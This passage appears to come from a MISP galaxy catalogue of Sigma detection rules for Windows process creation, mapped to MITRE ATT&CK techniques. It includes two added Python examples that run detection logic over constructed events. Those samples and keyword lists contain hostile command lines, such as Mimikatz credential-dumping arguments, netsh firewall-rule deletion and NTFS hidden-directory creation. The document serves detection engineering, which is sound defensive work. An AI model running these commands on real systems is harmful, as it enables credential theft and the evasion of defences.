https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation

https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml

Visual Basic Command Line Compiler Usage

Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.

The tag is: misp-galaxy:sigma-rules="Visual Basic Command Line Compiler Usage"

Visual Basic Command Line Compiler Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

Table 10583. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Vbc/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml

Potential DLL File Download Via PowerShell Invoke-WebRequest

Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet

The tag is: misp-galaxy:sigma-rules="Potential DLL File Download Via PowerShell Invoke-WebRequest"

Potential DLL File Download Via PowerShell Invoke-WebRequest has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10584. Table References

Links

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml

File Deletion Via Del

Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary’s footprint.

The tag is: misp-galaxy:sigma-rules="File Deletion Via Del"

File Deletion Via Del has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10585. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_execution.yml

Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE

Detects usage of "findstr" with the argument "385201", which could indicate discovery of an installed Sysinternals Sysmon service via its default driver altitude (even if the service name has been changed).

The tag is: misp-galaxy:sigma-rules="Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE"

Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 10586. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml

HackTool - Mimikatz Execution

Detects well-known Mimikatz command line arguments

The tag is: misp-galaxy:sigma-rules="HackTool - Mimikatz Execution"

HackTool - Mimikatz Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

Table 10588. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://tools.thehacker.recipes/mimikatz/modules

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml

HackTool - CoercedPotato Execution

Detects the use of CoercedPotato, a tool for privilege escalation

The tag is: misp-galaxy:sigma-rules="HackTool - CoercedPotato Execution"

HackTool - CoercedPotato Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10589. Table References

Links

https://github.com/hackvens/CoercedPotato

https://blog.hackvens.fr/articles/CoercedPotato.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_coercedpotato.yml

Potential PowerShell Downgrade Attack

Detects a PowerShell downgrade attack by comparing the host version with the engine version actually used (2.0)

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Downgrade Attack"

Potential PowerShell Downgrade Attack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10590. Table References

Links

http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/

https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml
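The version comparison behind the downgrade check above, as an added example that is not Sigma's, MISP's or any rule author's own code: it parses constructed Windows PowerShell classic Event ID 400 ("Engine state is changed from None to Available") messages, flags an EngineVersion of 2.x started by a host that is itself not 2.x, and adds the complementary process-creation check for an explicit "-Version 2" switch on the powershell.exe command line. The event bodies are constructed samples, and the regular expression for the version switch is this example's own approximation.

```python
"""Added example: PowerShell downgrade detection on constructed Event ID 400
messages plus a process-creation check for an explicit -Version 2 switch."""
import re

# Constructed Event 400 message bodies (Windows PowerShell classic log); not real logs.
EVENT_400_DOWNGRADE = """Engine state is changed from None to Available.

Details:
\tNewEngineState=Available
\tPreviousEngineState=None

\tSequenceNumber=13

\tHostName=ConsoleHost
\tHostVersion=5.1.19041.1
\tHostApplication=powershell.exe -version 2 -nop -w hidden
\tEngineVersion=2.0
"""

EVENT_400_NORMAL = """Engine state is changed from None to Available.

Details:
\tNewEngineState=Available
\tPreviousEngineState=None

\tSequenceNumber=13

\tHostName=ConsoleHost
\tHostVersion=5.1.19041.1
\tHostApplication=powershell.exe -nop -c whoami
\tEngineVersion=5.1.19041.1
"""

_KV = re.compile(r"^\s*(\w+)=(.*)$", re.MULTILINE)


def parse_event_400(message: str) -> dict:
    """Turn the key=value lines of the Details block into a dict."""
    return {k: v.strip() for k, v in _KV.findall(message)}


def _major(version: str):
    """Leading integer of a dotted version string, or None if absent."""
    m = re.match(r"\d+", version)
    return int(m.group(0)) if m else None


def is_downgrade(fields: dict) -> bool:
    """Engine 2.x was started by a host whose own version is not 2.x."""
    engine = _major(fields.get("EngineVersion", ""))
    host = _major(fields.get("HostVersion", ""))
    return engine == 2 and host is not None and host != 2


# powershell.exe accepts any unambiguous prefix of -Version; this pattern only
# covers "-v" and "-version" and should be widened for production use.
_VERSION_SWITCH = re.compile(r"(?i)(?:^|\s)-v(?:ersion)?\s+2(?:\.0)?(?=\s|$)")


def cmdline_requests_v2(cmdline: str) -> bool:
    """Process-creation side: the command line explicitly requests engine version 2."""
    return _VERSION_SWITCH.search(cmdline) is not None


if __name__ == "__main__":
    for name, body in (("downgrade", EVENT_400_DOWNGRADE), ("normal", EVENT_400_NORMAL)):
        fields = parse_event_400(body)
        print(name, fields["HostVersion"], "->", fields["EngineVersion"], is_downgrade(fields))
```

The Event 400 check is the more reliable of the two: an attacker can reach the 2.0 engine without the "-Version" switch (for example through a host application compiled against the v2 runtime), but the engine lifecycle event still records the mismatch.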

Firewall Rule Deleted Via Netsh.EXE

Detects the removal of a port or application rule in the Windows Firewall configuration using netsh

The tag is: misp-galaxy:sigma-rules="Firewall Rule Deleted Via Netsh.EXE"

Firewall Rule Deleted Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 10591. Table References

Links

https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_delete_rule.yml
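A minimal evaluator for process-creation rules of the kind listed above, as an added example that is not Sigma's, MISP's or any rule author's own code. It runs condensed versions of the "Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI", "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", "HackTool - Mimikatz Execution", "File Deletion Via Del" and "Firewall Rule Deleted Via Netsh.EXE" entries over constructed Sysmon Event ID 1 records. The field names follow the Sigma process_creation log source (Image, CommandLine); the rule bodies are this example's own reductions of the descriptions, not the upstream rules, and the Mimikatz keyword list is a subset of well-known module names.

```python
"""Added example: a tiny Sigma-style matcher for process-creation rules, run
over constructed Sysmon Event ID 1 records (no real telemetry)."""

# Constructed sample events.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c mkdir "C:\Users\Public\...::$INDEX_ALLOCATION"'},
    {"Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": r'findstr /i "385201" C:\Users\Public\drivers.txt'},
    {"Image": r"C:\Users\Public\x.exe",
     "CommandLine": 'x.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": 'netsh advfirewall firewall delete rule name="Remote Desktop"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c del /f /q C:\Users\Public\stage.dll"},
    {"Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": r'findstr /i "error" C:\logs\app.log'},
]

# Selections use Sigma's field|modifier syntax: keys in one selection are ANDed,
# values under "contains"/"endswith" are ORed, "contains|all" ANDs its values.
RULES = [
    {"title": "Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI",
     "selection": {"CommandLine|contains": ["::$index_allocation"]}},
    {"title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE",
     "selection": {"Image|endswith": ["\\findstr.exe"],
                   "CommandLine|contains": ["385201"]}},
    {"title": "HackTool - Mimikatz Execution",  # subset of well-known module names
     "selection": {"CommandLine|contains": ["sekurlsa::", "lsadump::",
                                            "privilege::debug", "kerberos::"]}},
    {"title": "Firewall Rule Deleted Via Netsh.EXE",
     "selection": {"Image|endswith": ["\\netsh.exe"],
                   "CommandLine|contains|all": ["firewall", "delete rule"]}},
    {"title": "File Deletion Via Del",
     "selection": {"Image|endswith": ["\\cmd.exe"],
                   "CommandLine|contains": [" del ", " erase "]}},
]


def _match(field_value, modifier, values):
    """Sigma string matching is case-insensitive."""
    v = field_value.lower()
    vals = [x.lower() for x in values]
    if modifier == "endswith":
        return any(v.endswith(x) for x in vals)
    if modifier == "contains":
        return any(x in v for x in vals)
    if modifier == "contains|all":
        return all(x in v for x in vals)
    raise ValueError(f"unsupported modifier: {modifier}")


def rule_matches(rule, event):
    """Every field|modifier entry of the selection must match the event."""
    for key, values in rule["selection"].items():
        field, _, modifier = key.partition("|")
        if not _match(event.get(field, ""), modifier, values):
            return False
    return True


def evaluate(events, rules=RULES):
    """Return (event index, rule title) for every rule that fires on each event."""
    return [(i, r["title"]) for i, e in enumerate(events) for r in rules
            if rule_matches(r, e)]


if __name__ == "__main__":
    for i, title in evaluate(EVENTS):
        print(f"event {i}: {title}")
```

The last event (a findstr run over an application log) is there to show the negative case: the altitude rule keys on the literal "385201", so ordinary findstr usage does not fire it.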

Remote File Download Via Desktopimgdownldr Utility

Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.

The tag is: misp-galaxy:sigma-rules="Remote File Download Via Desktopimgdownldr Utility"

Remote File Download Via Desktopimgdownldr Utility has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10592. Table References

Links

https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml

Suspicious Windows Update Agent Empty Cmdline

Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn’t contain any command line flags

The tag is: misp-galaxy:sigma-rules="Suspicious Windows Update Agent Empty Cmdline"

Suspicious Windows Update Agent Empty Cmdline has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10593. Table References

Links

https://redcanary.com/blog/blackbyte-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml

Certificate Exported Via PowerShell

Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

The tag is: misp-galaxy:sigma-rules="Certificate Exported Via PowerShell"

Certificate Exported Via PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10594. Table References

Links

https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a

https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_export_certificate.yml

Set Files as System Files Using Attrib.EXE

Detects the execution of "attrib" with the "+s" flag to mark files as system files

The tag is: misp-galaxy:sigma-rules="Set Files as System Files Using Attrib.EXE"

Set Files as System Files Using Attrib.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 10595. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib

https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml

Suspicious Service Path Modification

Detects service path modification via the "sc" binary to a suspicious command or path

The tag is: misp-galaxy:sigma-rules="Suspicious Service Path Modification"

Suspicious Service Path Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10596. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md

https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml

Cscript/Wscript Potentially Suspicious Child Process

Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.

The tag is: misp-galaxy:sigma-rules="Cscript/Wscript Potentially Suspicious Child Process"

Table 10597. Table References

Links

https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_22.12.2023.txt

Internal Research

https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml

Regsvr32 DLL Execution With Suspicious File Extension

Detects the execution of REGSVR32.exe with DLL files masquerading as other files

The tag is: misp-galaxy:sigma-rules="Regsvr32 DLL Execution With Suspicious File Extension"

Regsvr32 DLL Execution With Suspicious File Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10598. Table References

Links

https://guides.lib.umich.edu/c.php?g=282942&p=1885348

https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_extensions.yml

Remote CHM File Download/Execution Via HH.EXE

Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.

The tag is: misp-galaxy:sigma-rules="Remote CHM File Download/Execution Via HH.EXE"

Remote CHM File Download/Execution Via HH.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"

Table 10599. Table References

Links

https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37

https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md

https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml

Suspicious Extrac32 Alternate Data Stream Execution

Detects the use of extrac32 to extract data from a CAB file and hide it in an alternate data stream

The tag is: misp-galaxy:sigma-rules="Suspicious Extrac32 Alternate Data Stream Execution"

Suspicious Extrac32 Alternate Data Stream Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10600. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Extrac32/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml

Suspicious Windows Trace ETW Session Tamper Via Logman.EXE

Detects the execution of "logman" utility in order to disable or delete Windows trace sessions

The tag is: misp-galaxy:sigma-rules="Suspicious Windows Trace ETW Session Tamper Via Logman.EXE"

Suspicious Windows Trace ETW Session Tamper Via Logman.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 10601. Table References

Links

https://twitter.com/0gtweet/status/1359039665232306183?s=21

https://ss64.com/nt/logman.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logman_disable_eventlog.yml

Potential Tampering With Security Products Via WMIC

Detects uninstallation or termination of security products using the WMIC utility

The tag is: misp-galaxy:sigma-rules="Potential Tampering With Security Products Via WMIC"

Potential Tampering With Security Products Via WMIC has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10602. Table References

Links

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/

https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html

https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/

https://twitter.com/cglyer/status/1355171195654709249

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml

Audio Capture via PowerShell

Detects audio capture via PowerShell Cmdlet.

The tag is: misp-galaxy:sigma-rules="Audio Capture via PowerShell"

Audio Capture via PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 10603. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html

https://github.com/frgnca/AudioDeviceCmdlets

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml

Computer Discovery And Export Via Get-ADComputer Cmdlet

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

The tag is: misp-galaxy:sigma-rules="Computer Discovery And Export Via Get-ADComputer Cmdlet"

Computer Discovery And Export Via Get-ADComputer Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10604. Table References

Links

https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml

Arbitrary File Download Via MSPUB.EXE

Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via MSPUB.EXE"

Arbitrary File Download Via MSPUB.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10605. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/238/files

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mspub_download.yml

Potential Arbitrary Code Execution Via Node.EXE

Detects the execution of node.exe, which is shipped with multiple software products such as VMware, Adobe, etc., in order to execute arbitrary code, for example to establish a reverse shell as seen in Log4j attacks.

The tag is: misp-galaxy:sigma-rules="Potential Arbitrary Code Execution Via Node.EXE"

Potential Arbitrary Code Execution Via Node.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10606. Table References

Links

https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/

https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://nodejs.org/api/cli.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml

UAC Bypass Using ChangePK and SLUI

Detects a UAC bypass that uses changepk.exe and slui.exe (UACMe 61)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using ChangePK and SLUI"

UAC Bypass Using ChangePK and SLUI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10607. Table References

Links

https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b

https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml

Change Default File Association Via Assoc

Detects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

The tag is: misp-galaxy:sigma-rules="Change Default File Association Via Assoc"

Change Default File Association Via Assoc has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001" with estimative-language:likelihood-probability="almost-certain"

Table 10608. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml

Fsutil Behavior Set SymlinkEvaluation

Detects "fsutil behavior set SymlinkEvaluation" being used to change how symbolic links are evaluated. A symbolic link is a type of file that contains a reference to another file. Ransomware (see the BlackCat reference below) has been observed doing this, probably to make sure it can follow shortcuts on the machine in order to find the original file to encrypt.

The tag is: misp-galaxy:sigma-rules="Fsutil Behavior Set SymlinkEvaluation"

Fsutil Behavior Set SymlinkEvaluation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10609. Table References

Links

https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior

https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml

LSASS Process Reconnaissance Via Findstr.EXE

Detects findstr commands that include the keyword "lsass", which indicates reconnaissance activity for the LSASS process PID

The tag is: misp-galaxy:sigma-rules="LSASS Process Reconnaissance Via Findstr.EXE"

LSASS Process Reconnaissance Via Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

Table 10610. Table References

Links

https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml

Deletion of Volume Shadow Copies via WMI with PowerShell

Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

The tag is: misp-galaxy:sigma-rules="Deletion of Volume Shadow Copies via WMI with PowerShell"

Deletion of Volume Shadow Copies via WMI with PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10611. Table References

Links

https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml

HackTool - DInjector PowerShell Cradle Execution

Detects the use of the DInjector PowerShell cradle based on its specific flags

The tag is: misp-galaxy:sigma-rules="HackTool - DInjector PowerShell Cradle Execution"

HackTool - DInjector PowerShell Cradle Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10612. Table References

Links

https://github.com/snovvcrash/DInjector

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_dinjector.yml

Hacktool Execution - Imphash

Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed

The tag is: misp-galaxy:sigma-rules="Hacktool Execution - Imphash"

Hacktool Execution - Imphash has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10613. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml

Invoke-Obfuscation VAR+ Launcher

Detects Obfuscated use of Environment Variables to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR+ Launcher"

Invoke-Obfuscation VAR+ Launcher has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10614. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml

Uncommon Child Processes Of SndVol.exe

Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)

The tag is: misp-galaxy:sigma-rules="Uncommon Child Processes Of SndVol.exe"

Table 10615. Table References

Links

https://twitter.com/Max_Mal_/status/1661322732456353792

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sndvol_susp_child_processes.yml

Suspicious Electron Application Child Processes

Detects suspicious child processes of Electron apps (Teams, Discord, Slack, etc.). This could be a potential sign of ".asar" file tampering (see the reference section for more information) or of binary execution proxying through specific CLI arguments (see the related rule)

The tag is: misp-galaxy:sigma-rules="Suspicious Electron Application Child Processes"

Table 10616. Table References

Links

https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf

https://lolbas-project.github.io/lolbas/Binaries/Teams/

https://github.com/mttaggart/quasar

https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/

